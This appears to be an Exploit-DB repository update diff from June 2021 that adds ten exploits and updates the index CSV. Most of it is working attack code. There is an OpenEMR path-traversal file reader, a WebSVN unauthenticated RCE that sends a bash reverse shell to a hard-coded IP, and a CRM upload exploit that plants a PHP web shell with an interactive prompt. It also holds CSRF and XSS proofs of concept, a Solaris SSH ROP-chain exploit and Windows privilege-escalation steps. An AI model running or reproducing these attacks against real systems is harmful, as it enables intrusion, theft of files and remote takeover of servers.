DB: 2021-06-22

10 changes to exploits/shellcodes

Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path
iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path
Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path
Remote Mouse GUI 3.008 - Local Privilege Escalation

Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)
Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)
Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)
Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
Customer Relationship Management System (CRM) 1.0 - Remote Code Execution

exploits/php/webapps/50037.py

@@ -0,0 +1,129 @@
+# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)
+# Date 16.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
+# Version: All versions prior to 5.0.2
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2019-14530
+# CWE: CWE-22
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md
+# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf
+
+'''
+Description:
+An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.
+An authenticated attacker can download any file (that is readable by the user www-data)
+from server storage. If the requested file is writable for the www-data user and the directory
+/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
+'''
+
+
+'''
+Banner:
+'''
+banner = """ 
+ 
+ 
+ ______     _______     ____   ___  _  ___        _ _  _  ____ _____  ___  
+ / ___\ \   / / ____|   |___ \ / _ \/ |/ _ \      / | || || ___|___ / / _ \ 
+| |    \ \ / /|  _| _____ __) | | | | | (_) |_____| | || ||___ \ |_ \| | | |
+| |___  \ V / | |__|_____/ __/| |_| | |\__, |_____| |__   _|__) |__) | |_| |
+ \____|  \_/  |_____|   |_____|\___/|_|  /_/      |_|  |_||____/____/ \___/ 
+                        
+                                            by Hacker5preme
+                                                                            
+"""
+print(banner)
+
+
+'''
+Import required modules:
+'''
+import requests
+import argparse
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+openemr_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+print('')
+Filepath = input('[+] Filepath: ')
+
+
+'''
+Authentication:
+'''
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'
+
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'new_login_session_management': '1',
+    'authProvider': 'Default',
+    'authUser': username,
+    'clearPass': password,
+    'languageChoice': '1'
+}
+
+# Authenticate:
+print('')
+auth = session.post(auth_url, headers=header, data=body)
+if 'error=1&site=' in auth.text:
+    print('[-] Authentication failed')
+    exit()
+else:
+    print('[+] Authentication successfull: ' + str(auth))
+
+
+'''
+Path Traversal:
+'''
+url_static = 'http://' + target_ip + ':' + target_port + openemr_path
+url_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'
+url_exploit = url_static + url_dynamic + Filepath
+print('')
+print('[+] Constructed malicious URL: ')
+
+# Headers:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Exploit:
+print('')
+print('[+] Contents of ' + Filepath + ':')
+print('')
+getfile = session.get(url_exploit, headers = header)
+print(getfile.text)

exploits/php/webapps/50042.py

@@ -0,0 +1,30 @@
+# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
+# Date: 20/06/2021
+# Exploit Author: g0ldm45k
+# Vendor Homepage: https://websvnphp.github.io/
+# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
+# Version: 2.6.0
+# Tested on: Docker + Debian GNU/Linux (Buster)
+# CVE : CVE-2021-32305
+
+import requests
+import argparse
+from urllib.parse import quote_plus
+
+PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
+REQUEST_PAYLOAD = '/search.php?search=";{};"'
+
+parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
+parser.add_argument('target', type=str, help="Target URL.")
+
+args = parser.parse_args()
+
+if args.target.startswith("http://") or args.target.startswith("https://"):
+    target = args.target
+else:
+    print("[!] Target should start with either http:// or https://")
+    exit()
+
+requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
+
+print("[*] Request send. Did you get what you wanted?")

exploits/php/webapps/50043.html

@@ -0,0 +1,28 @@
+# Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)
+# Date: 20/06/2021
+# Exploit Author: Riadh Benlamine (rbn0x00)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link:   https://phpgurukul.com/small-crm-php/
+# Version: 3.0
+# Category: Webapps
+# Tested on: Apache2+MariaDB latest version
+# Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url
+
+Vulnerable page: /crm/profile.php
+
+POC:
+----
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="name" value="test" />
+      <input type="hidden" name="alt&#95;email" value="" />
+      <input type="hidden" name="phone" value="0123456789" />
+      <input type="hidden" name="gender" value="m" />
+      <input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
+      <input type="hidden" name="update" value="Update" />
+      <input type="submit" value="Exploit" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/50044.txt

@@ -0,0 +1,55 @@
+# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)
+# Date: 20/06/2021
+# Exploit Author: Riadh Benlamine (rbn0x00)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link:   https://phpgurukul.com/small-crm-php/
+# Version: 3.0
+# Category: Webapps
+# Tested on: Apache2+MariaDB latest version
+# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.
+
+Vunlerable page: /crm/profile.php
+
+POC:
+----
+POST /crm/profile.php HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------386571683933745493952831205283
+Content-Length: 779
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/crm/profile.php
+Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1
+Upgrade-Insecure-Requests: 1
+
+-----------------------------386571683933745493952831205283
+Content-Disposition: form-data; name="name"
+<script>alert('xss')</script>
+-----------------------------386571683933745493952831205283
+
+Content-Disposition: form-data; name="alt_email"
+
+-----------------------------386571683933745493952831205283
+
+Content-Disposition: form-data; name="phone"
+0123456789
+
+-----------------------------386571683933745493952831205283
+
+Content-Disposition: form-data; name="gender"
+m
+
+-----------------------------386571683933745493952831205283
+
+Content-Disposition: form-data; name="address"
+
+-----------------------------386571683933745493952831205283
+
+Content-Disposition: form-data; name="update"
+Update
+
+-----------------------------386571683933745493952831205283--

exploits/php/webapps/50046.txt

@@ -0,0 +1,58 @@
+# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
+# Date: 21.06.2021
+# Exploit Author: Ishan Saha
+# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
+# Version: 1.x
+# Tested on: Ubuntu
+
+# REQUREMENTS # 
+#     run pip3 install requests colorama beautifulsoup4
+
+# DESCRIPTION #
+
+#    # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option
+
+#    # Exploit Working:
+#    # 1. Starting a session with the server 
+#    # 2. Registering a user hackerctf : hackerctf and adding payload in image
+#    # 3. Finding the uploaded file location in the username image tag 
+#    # 4. Runing the payload file  to give a shell
+
+
+#!/usr/bin/python3
+import requests , time
+from bs4 import BeautifulSoup as bs
+from colorama import Fore, Back, Style
+
+# Variables : change the URL according to need
+URL="http://192.168.0.245/crm/"                     # CHANGE THIS 
+shellcode = "<?php system($_GET['cmd']);?>"
+filename = "shell.php"
+content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}
+authdata={"username":"hackerctf","password":"hackerctf"}
+def format_text(title,item):
+  cr = '\r\n'
+  section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr 
+  item=str(item)
+  text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+  Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
+  return text
+
+ShellSession = requests.Session()
+response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")})
+response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata)
+response = ShellSession.get(URL + "customer/")
+soup = bs(response.text,"html.parser")
+location= soup.find('img')['src']
+
+#print statements
+print(format_text("Target",URL),end='')
+print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
+print(format_text("shell location",location),end='')
+print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
+
+while True:
+    cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
+    if cmd == 'exit':
+        break
+    print(ShellSession.get(location + "?cmd="+cmd).content.decode())

exploits/solaris/remote/50039.py

@@ -0,0 +1,55 @@
+# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
+# Exploit Author: Nathaniel Singer, Joe Rozner
+# Date: 09/11/2020
+# CVE: 2020-14871
+
+# Vulnerable Version(s): Oracle Solaris: 9 (some releases), 10 (all releases), 11.0
+# Description: CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6. The vulnerability received a CVSSv3 score of 10.0, the maximum possible score.
+
+# Vendor Homepage: https://www.oracle.com/solaris
+# Software Link: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-downloads.html
+# Tested on: Software Hash (md5): aae1452bb3d56baa3dcb8866ce7e4a08 2254110720: sol-10-u11-ga-x86-dvd.iso
+
+# Notes: We ran into an interesting LIBC descrepancy during testing. The sysenter gadget (0xfebbbbf4), last in the stage one chain, was accessible when the testing VM was running on a MacOS host, however, when we ran the vulnerable Solaris box on a Windows host, that gadget was not located at the same address and we actually were unable to find it anywhere in memory. Hopefully someone smarter than us can figure out why this is, but you may run into this during your testing as well.
+
+#!/usr/bin/python3
+
+from pwn import *
+
+########## BUILD ##########
+# mprotect shellcode, stage one to mark the page containing our shellcode as executable
+buf = b"\x31\xc0\x31\xc9\xbb\x01\x40\x04\x08\x66\xb8\x01\x40"
+buf += b"\xb1\x07\x4b\x48\x51\x50\x53\x53\x89\xe1\x31\xc0\xb0"
+buf += b"\x74\xcd\x91"
+
+# Actual stage two shellcode, drop into after mprotect call
+# ./msfvenom -p solaris/x86/shell_reverse_tcp -b "\x20\x09\x00\x0d\x0a" LHOST="192.168.1.215" LPORT=4444 -f python
+buf += b"<big bad effect here, as a bytestring; limit 512 bytes>"
+pad = b'A'* (512-len(buf))
+
+# manual assembly of ROP chain due to pwntools chainer bugs, DWORD returns :/
+g = []
+g.append(p32(0x080431c3)) #ebp overwrite to prevent ecx corrupt and crash
+g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret
+g.append(p32(0x08072829)) #pop ebx; ret
+g.append(p32(0x08040101)) #write ecx value (0x0a) to address, prevents crash
+g.append(p32(0x0805ba07)) #pop ecx; pop edx; pop ebp
+g.append(p32(0x08046ee0)) #ptr(0x?,0x0x1000,0x7)
+g.append(p32(0x08043001)) #edx pointer to page+1 for mprotect
+g.append(p32(0x080431b8)) #unused ebp value
+g.append(p32(0x08072261)) #decrement edx so correct page addr
+g.append(p32(0xfefe2d8b)) #mov DWORD PTR [ecx+0x4],edx; xor eax; ret
+g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret
+g.append(p32(0x0805ba08)) #pop edx; pop ebp; ret
+g.append(p32(0x080431b8)) #addr of shellcode
+g.append(p32(0xfed86ca3)) #unused ebx value
+g.append(p32(0xfebb56f6)) #sysenter (ret into sc via edx)
+chain = b''.join(g) #assemble the list into a bytestring, final rop chain
+print(f"Sending Exploit: {chain}")
+
+########## EXPLOIT ##########
+remote_host = "192.168.25.130”
+io = process(f'/usr/bin/ssh -l \"\" -o \"PreferredAuthentications keyboard-interactive\" {remote_host}', shell=True, stdin=PTY)
+
+io.recv() #username prompt
+io.sendline(buf + pad + chain) #exploit

exploits/windows/local/50038.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path
+# Date: 2021-06-18
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.wisecleaner.com/wise-care-365.html
+# Software Link: https://downloads.wisecleaner.com/soft/WiseCare365_5.6.7.568.exe
+# Version: 5.6.7.568
+# Service File Version 1.2.4.54
+# Tested on: Windows 10 Pro x64 es 
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%WiseBootAssistant%"' get displayname, pathname, startmode, startname
+
+DisplayName          PathName                                                StartMode  StartName
+Wise Boot Assistant  C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe  Auto       LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "WiseBootAssistant"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WiseBootAssistant
+        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Wise Boot Assistant
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.

exploits/windows/local/50040.txt

@@ -0,0 +1,39 @@
+# Exploit Title: iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path
+# Date: 2021-06-18
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.i-funbox.com/en/index.html
+# Software Link: https://www.i-funbox.com/download/ifunbox_setup_4.2.exe
+# Version: 4.2
+# Service File Version: 486.0.2.23
+# Tested on: Windows 10 Pro x64 es 
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%Apple Mobile Device Service%"' get displayname, pathname, startmode, startname
+
+DisplayName                  PathName                                                                                    StartMode  StartName
+Apple Mobile Device Service  C:\Program Files (x86)\i-Funbox DevTeam\Mobile Device Support\AppleMobileDeviceService.exe  Auto       LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "Apple Mobile Device Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Apple Mobile Device Service
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\i-Funbox DevTeam\Mobile Device Support\AppleMobileDeviceService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Apple Mobile Device Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.

exploits/windows/local/50045.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path
+# Date: 2021-06-20
+# Exploit Author: Julio Aviña
+# Vendor Homepage: https://www.lexmark.com/
+# Software Link: https://downloads.lexmark.com/downloads/drivers/Lexmark_Printer_Software_G2_Installation_Package_01292021.exe
+# Version: 1.8.0.0
+# Tested on: Windows 10 Pro x64 es 
+# Vulnerability Type: Unquoted Service Path
+
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%LM__bdsvc%"' get displayname, pathname, startmode, startname
+
+DisplayName                   PathName                                     StartMode  StartName
+Lexmark Communication System  C:\Program Files\Lexmark\Bidi\LM__bdsvc.exe  Auto       LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "LM__bdsvc"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: LM__bdsvc
+        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Lexmark\Bidi\LM__bdsvc.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Lexmark Communication System
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# 3. Exploit:
+
+A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
+When restarting the service or the system, the inserted executable will run with elevated privileges.

exploits/windows/local/50047.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation
+# Exploit Author: Salman Asad (@deathflash1411)
+# Date: 17.06.2021
+# Version: Remote Mouse 3.008
+# Tested on: Windows 10 Pro Version 21H1
+
+# Note: Local/RDP access is required to exploit this vulnerability
+
+This method is also known as Citrix Method (Insecure GUI App)
+After installation remote mouse runs as administrator and autostarts by default
+
+PoC:
+
+Open remote mouse from the system tray
+Go to Settings
+Click "Change..." in the "Image Transfer Folder" area
+Save As prompt will appear
+Enter "C:\Windows\System32\cmd.exe"
+Command Prompt is spawned with administrator privileges

files_exploits.csv

@@ -11375,6 +11375,10 @@ id,file,description,date,author,type,platform,port
 50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
 50026,exploits/windows/local/50026.txt,"VX Search 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
 50028,exploits/windows/local/50028.txt,"Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path",2021-06-17,"Ismael Nava",local,windows,
+50038,exploits/windows/local/50038.txt,"Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
+50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
+50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
+50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18510,6 +18514,7 @@ id,file,description,date,author,type,platform,port
 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux,
 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware,
 50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware,
+50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",2021-06-21,"Nathaniel Singer",remote,solaris,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -44185,3 +44190,8 @@ id,file,description,date,author,type,platform,port
 50031,exploits/php/webapps/50031.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)",2021-06-18,"Piyush Patil",webapps,php,
 50032,exploits/php/webapps/50032.xml,"ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)",2021-06-18,"Piyush Patil",webapps,php,
 50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,
+50037,exploits/php/webapps/50037.py,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)",2021-06-21,"Ron Jost",webapps,php,
+50043,exploits/php/webapps/50043.html,"Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)",2021-06-21,"Riadh Benlamine",webapps,php,
+50044,exploits/php/webapps/50044.txt,"Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)",2021-06-21,"Riadh Benlamine",webapps,php,
+50042,exploits/php/webapps/50042.py,"Websvn 2.6.0 - Remote Code Execution (Unauthenticated)",2021-06-21,g0ldm45k,webapps,php,
+50046,exploits/php/webapps/50046.txt,"Customer Relationship Management System (CRM) 1.0 - Remote Code Execution",2021-06-21,"Ishan Saha",webapps,php,